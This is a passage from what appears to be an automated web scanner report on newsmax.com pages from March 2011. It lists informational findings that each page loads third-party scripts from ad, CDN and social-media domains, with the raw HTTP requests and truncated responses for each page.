Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 43446
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   'Supe
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

2.13. http://www.newsmax.com/Headline/franklin-graham-christians-muslims/2011/03/18/id/389992  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Headline/franklin-graham-christians-muslims/2011/03/18/id/389992

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Headline/franklin-graham-christians-muslims/2011/03/18/id/389992 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 59034
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:03:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Frank
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.14. http://www.newsmax.com/Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Home

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Home HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 77231
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
<div class="demo unicorn_vertplayer_playlistdiv">
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...

2.15. http://www.newsmax.com/HotTopics  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /HotTopics

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /HotTopics HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 34488
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.16. http://www.newsmax.com/InsideCover/63SenatorsUrgeObamatoLeadonDebt/2011/03/18/id/389975  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /InsideCover/63SenatorsUrgeObamatoLeadonDebt/2011/03/18/id/389975

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /InsideCover/63SenatorsUrgeObamatoLeadonDebt/2011/03/18/id/389975 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53709
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:06:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   64 Se
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.17. http://www.newsmax.com/InsideCover/Books-ValeriePlameWilson/2011/03/19/id/390010  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /InsideCover/Books-ValeriePlameWilson/2011/03/19/id/390010

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /InsideCover/Books-ValeriePlameWilson/2011/03/19/id/390010 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53404
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:05:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Valer
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.18. http://www.newsmax.com/InsideCover/Gingrich-Obama-Spectator-in-Chief/2011/03/18/id/389898  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /InsideCover/Gingrich-Obama-Spectator-in-Chief/2011/03/18/id/389898

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /InsideCover/Gingrich-Obama-Spectator-in-Chief/2011/03/18/id/389898 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 57907
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:04:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Gingr
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.19. http://www.newsmax.com/InsideCover/Giuliani-NH/2011/03/19/id/390014  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /InsideCover/Giuliani-NH/2011/03/19/id/390014

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /InsideCover/Giuliani-NH/2011/03/19/id/390014 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53347
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:05:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Giuli
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.20. http://www.newsmax.com/InsideCover/HiddenCameraActivist/2011/03/18/id/389987  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /InsideCover/HiddenCameraActivist/2011/03/18/id/389987

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /InsideCover/HiddenCameraActivist/2011/03/18/id/389987 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 54642
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:06:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Activ
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.21. http://www.newsmax.com/InsideCover/MurkowskiJapanChernobyl/2011/03/18/id/389981  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /InsideCover/MurkowskiJapanChernobyl/2011/03/18/id/389981

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /InsideCover/MurkowskiJapanChernobyl/2011/03/18/id/389981 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53430
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:06:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Murko
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.22. http://www.newsmax.com/InsideCover/Obama-High-SpeedRail/2011/03/19/id/390017  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /InsideCover/Obama-High-SpeedRail/2011/03/19/id/390017

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /InsideCover/Obama-High-SpeedRail/2011/03/19/id/390017 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53632
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:05:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Obama
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.23. http://www.newsmax.com/InsideCover/Republicans/2011/03/19/id/390003  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /InsideCover/Republicans/2011/03/19/id/390003

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /InsideCover/Republicans/2011/03/19/id/390003 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53253
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:05:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Rep.
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.24. http://www.newsmax.com/InsideCover/UN-UN-US-Human/2011/03/18/id/389988  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /InsideCover/UN-UN-US-Human/2011/03/18/id/389988

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /InsideCover/UN-UN-US-Human/2011/03/18/id/389988 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 56141
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:03:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Obama
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.25. http://www.newsmax.com/InsideCover/WisconsinBudget-E-Mails/2011/03/18/id/389990  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /InsideCover/WisconsinBudget-E-Mails/2011/03/18/id/389990

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /InsideCover/WisconsinBudget-E-Mails/2011/03/18/id/389990 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 58775
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:06:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Wis.
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.26. http://www.newsmax.com/InsideCover/allen-west-obama-military/2011/03/18/id/389991  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /InsideCover/allen-west-obama-military/2011/03/18/id/389991

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /InsideCover/allen-west-obama-military/2011/03/18/id/389991 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 56913
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:03:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Allen
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
